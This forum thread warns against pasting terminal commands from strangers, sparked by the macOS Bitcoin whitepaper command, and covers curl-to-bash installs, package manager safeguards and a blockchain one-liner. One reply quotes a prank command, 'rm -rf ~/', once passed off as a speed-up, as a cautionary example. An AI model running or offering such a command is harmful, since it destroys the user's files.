pull down to refresh

With all the discussion around the Bitcoin whitepaper being discovered in macOS, I think it’s important to take a step back from a security perspective.
All of these posts on Twitter and elsewhere said “Open the terminal and run some command to see the Bitcoin whitepaper!” I’ve intentionally omitted the command here.
For those in the technology security industry, you’re aware of the risks running an arbitrary command on the command line. But many others are not aware of the risk.
I want to put this simply:

Do NOT run commands directed by internet strangers in your terminal*

* unless you know what you’re doing
There are infinitely many bad things that can happen from copy-pasting some command into the terminal and running it. These can range from downloading malware, wiping your hard drive, exfiltrating sensitive data, etc.
In this particular case, the command was pretty transparent about what it was doing and was safe. But that’s not a guarantee.
Be careful folks.
561 sats \ 6 replies \ @ek 7 Apr 2023
Good post.
Websites which provide install instructions as curl <url> | bash are also very guilty of this.
reply
I don't see how this is any different from installing any other program on your computer. Most people using Windows just type in their admin password when installing stuff. And the people on Linux installing something with terminal instructions are basically the same thing.
reply
I see your point but I also see a difference between running random code and being suspectible to the issues mentioned in the article vs running code which is more or less guaranteed that it does what you want:
A package manager is a common and welcome sight in the world of Linux-based operating systems. When installing software using a package manager we have a guarantee that all (or most) of the files used by the program will be tracked and accounted for and removed when uninstalling it. The same is true for various dependencies and the package manager also provides us with many other security measures such as ensuring that files belonging to an already installed program will not be overwritten by accident during the installation process. When executing an unknown script we don't know what is going to happen - we will not be able to easily find out what files were installed. This problem is mostly related to a simple necessity of keeping track of various entries in your file system. Imagine the chaos arising if every program was installed manually without the help a package manager. This also exposes you to unpached security issues as the installed program will not be automatically updated.
(also from the mentioned article)
Things not mentioned are for example checksums which are also checked automatically by package managers.
reply
In fact it goes further than that - pretty much every Linux package manager will refuse to even load packages from a repo unless the repo's PGP key matches up with the public key on your local system. You cannot add a new repo without adding the PGP key. If a malicious actor hacked the repo, they could not push out packages without also obtaining access to the private PGP key of the repo owner.
Windows users may be used to installing random executables, but Windows systems also tend to have a lot of malware. Linux has many extra layers of security vs Windows, which doesn't even have a package manager unless you install a third party one - same is true of macOS as well, if we're being fair.
Point is, when discussing Linux security, saying "but piping random scripts direct to bash with sudo is as secure as Windows" is basically the computing equivalent of "better love story than Twilight."
reply
Great addition, thanks.
Really interested to see if this changed @zuspotirko's mind
reply
Do people frequently install executables from Twitter posts?
reply
There is no difference if it's a Tweet or a Github ReadMe or a recommendation from a friend: if you don't know what you are installing you don't know what you're installing no matter the source
reply
I generally agree with you but
it's literally just open <path>.pdf. Like literally. One has to be a special kind of regarded to not know what their're doing. It doesn't get more simple than that
reply
Like I said, this one was transparent about what it was doing. But it sets a dangerous precedent.
reply
???
Are you aware how irrelevant this "precedent" is or are you mistaken about the meaning about the word "precedent"? People have been posting terminal commands on the internet for decades now.
That's like saying someone stealing from Walmart last week was a precedent. It's not. Theft has existed forever, it's not a "precedent"
reply
22 sats \ 1 reply \ @ek 7 Apr 2023
Maybe precedent is not the right term here. Maybe enabling bad behavior fits better?
I think the post was a bit ill formulated. I think the post was less about that specific command but more generally about running random code without verifying or not taking any precautions.
At least that's how I read it.
reply
Yeah that's the message I got too. The terminal command in question is harmless, and OP explicitly says this along with saying it was transparent about what it is doing, but the point is to be wary of blindly pasting terminal commands if you are unsure about exactly what they do. It takes five seconds to paste them into Google before running them on your system.
It wasn't that long ago people were posting shit like "make your Mac 10x faster by running rm -rf ~/" and "delete system32 it's a virus" and yes people actually fell for that shit.
When people get into the habit of blindly trusting terminal commands without understanding what they're doing, they can easily fuck their shit up.
The tl;dr is simply "don't trust, verify."
reply
Sure, but with this one liner you can download the bitcoin whitepaper pdf straight from the blockchain:
seq 0 947 | (while read -r n; do bitcoin-cli gettxout 54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713 $n | jq -r '.scriptPubKey.asm' | awk '{ print $2 $3 $4 }'; done) | tr -d '\n' | cut -c 17-368600 | xxd -r -p > bitcoin.pdf
reply
Absolutely agree, very true
reply
Do NOT run commands directed by internet strangers in your terminal
*including chatbots (like claude.ai)
The LLMs may make honest mistakes today. I believe it's only a matter of time before they intentionally suggest code that has an ulterior motive which is sinister in ways that could benefit the AIs themselves, or their developers.
reply